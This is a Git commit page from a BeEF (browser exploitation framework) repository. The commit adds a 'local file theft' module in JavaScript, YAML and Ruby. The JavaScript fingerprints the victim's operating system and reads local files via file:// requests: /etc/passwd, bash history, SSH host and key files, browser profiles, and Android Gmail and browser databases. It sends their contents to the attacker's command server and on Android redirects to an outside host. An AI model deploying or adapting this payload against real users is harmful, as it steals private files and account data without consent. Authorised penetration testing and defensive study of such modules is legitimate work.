Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

added local file theft module

Browse Source
This commit is contained in:
Mike Haworth
2012-01-20 23:14:38 +13:00
parent 7478a2fe9d
commit ee1f4df1ea
3 changed files with 239 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

212
modules/misc/local_file_theft/command.js Normal file
View File

@@ -0,0 +1,212 @@
// local_file_theft
//
// Shamelessly plagurised from kos.io/xsspwn
beef.execute(function() {
result = '';
fileList = ['linux','mac','ios','android','windows']
fileList['linux']= {
// How do we discover users?
"discover" :'/etc/passwd',
// Okay, we found them, what do we pillage?
"post" :{
'bashHistory':'.bash_history',
'sshHosts':'.ssh/known_hosts',
'sshKeys':'.ssh/id_rsa.pub',
'firefoxProfiles':'.mozilla/firefox/profiles.ini',
'chromeBookmarks':'.config/chromium/Default/Bookmarks'
}
}
fileList['mac']= {
// How do we discover users?
"discover" :'/Library/Preferences/com.apple.loginwindow.plist',
// Okay, we found them, what do we pillage?
"post" :{
'bashHistory':'.bash_history',
'sshHosts':'.ssh/known_hosts',
'sshKeys':'.ssh/id_rsa.pub',
'firefoxProfiles':'.mozilla/firefox/profiles.ini',
'chromeBookmarks':'.config/chromium/Default/Bookmarks'
}
}
fileList['android']= {
// Instead of how, just figure out the currently in use appi
"discover" :'/proc/self/status',
// Okay, we found them, what do we pillage?
"post" :{
'browser_data':'/data/data/com.android.browser/databases/webview.db',
'browser_data2':'/data/data/com.android.browser/databases/browser.db',
'gmail_accounts':'/data/data/com.google.android.gm/shared_prefs/Gmail.xml',
'dolpin_data':'/data/data/mobi.mgeek.TunnyBrowser/databases/webview.db',
'dolpin_data2':'/data/data/mobi.mgeek.TunnyBrowser/databases/browser.db',
'chromeBookmarks':'.config/chromium/Default/Bookmarks'
}
}
fileList['ios']= {
// WHAT IS THIS I DON'T EVEN
"discover" :'',
"post" :{
'iPadEtcHosts':'/etc/hosts'
}
}
fileList['windows']= {
// Meh, who cares
"discover" :'',
"post" :{
'bootini':'/c:/boot.ini',
'hosts':'/c:/WINDOWS/system32/drivers/etc/hosts'
}
}
functionList = {
mac:{
// OS X disovery
discover : function(){
tmp = new XMLHttpRequest()
tmp.open('get',"file:///"+fileList['mac']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
// TODO
// Understand plist format to _reliably_ pull out username with regex
//user = tmp.responseText.match(/\x03\x57(.*)\x12/)[1];
user = tmp.responseText.match(/\x54(.*)\x12\x01/)[1];
homedir = "/Users/"+user+"/";
grabFiles(homedir,"mac")
}
}
return true;
}
},
linux:{
// Linux username discovery
discover : function(){
tmp = new XMLHttpRequest()
tmp.open('get',"file:///"+fileList['linux']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
userDir = tmp.responseText.match(/[a-z0-9]*:x:[0-9]{4}:[0-9]{4}:[^:]*:([^:]*)/)[1];
homedir = userDir+"/";
grabFiles(homedir,"linux")
}
}
return true;
}
},
ios:{
// Grab ipad stuff
discover : function(){
tmp = new XMLHttpRequest()
tmp.open('get',fileList['ios']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
homedir = "file:///";
grabFiles(homedir,"ios")
}
}
alert("ipad")
}
},
android:{
// figure out what app (gmail, browser, or dolphin?) android
discover : function(){
//document.location="http://kos.io/"
tmp = new XMLHttpRequest()
tmp.open('get',fileList['android']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
if(/.*android\.gm.*/.test(tmp.responseText)){
document.location="http://kos.io/gmail"
} else if(/.*android\.browser.*/.test(tmp.responseText)){
document.location="http://kos.io/browser"
} else if(/.*ek\.TunnyBrowser.*/.test(tmp.responseText)){
document.location="http://kos.io/dolphin"
}
grabFiles("/","android")
}
}
return true;
}
}
}
function identify(){
if(/.*Android.*/.test(navigator.userAgent)){
return "android"
} else if(/Linux.*/i.test(navigator.platform)){
return "linux"
} else if(/iP.*/i.test(navigator.platform)){
return "ios"
} else if(/.*Mac.*/i.test(navigator.userAgent)){
return "mac"
} else if(/.*Windows.*/i.test(navigator.userAgent)){
return "windows"
} else if(/.*hpwOS.*/i.test(navigator.platform)){
return "webos"
}
}
function discoverUsers(os){
return functionList[os]['discover']()
}
function grabFiles(dir,os){
tmpfile = {}
for (i in fileList[os]['post']){
console.log('dir = ' + dir);
console.log('fileList: ' + fileList[os]['post'][i]);
console.log(i);
tmpfile[i] = new XMLHttpRequest()
tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]);
tmpfile[i].send();
tmpfile[i].onreadystatechange=function(){
for (j in fileList[os]['post']){
if(tmpfile[j].readyState==4){
console.log('new returned for: ' + j);
result = j +": "+ tmpfile[j].responseText;
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);
}
}
}
}
}
discoverUsers(identify());
});

14
modules/misc/local_file_theft/config.yaml Normal file
View File

@@ -0,0 +1,14 @@
# local_file_theft
#
# Shamelessly plagurised from kos.io/xsspwn
beef:
module:
local_file_theft:
enable: true
category: "Misc"
name: "Local File Theft"
description: "Javascript may have filesystem access if we are running from a local resource and using the file:// scheme, this module checks common locations and cheekily snaches anything it finds. Shameless plagurised from kos.io/xsspwn. To test this module save the beefhook page locally and open in safari from the your localfile system"
authors: ["mh"]
target:
working: ["All"]

13
modules/misc/local_file_theft/module.rb Normal file
View File

@@ -0,0 +1,13 @@
# local_file_theft
#
# Shamelessly plagurised from kos.io/xsspwn
class Local_file_theft < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end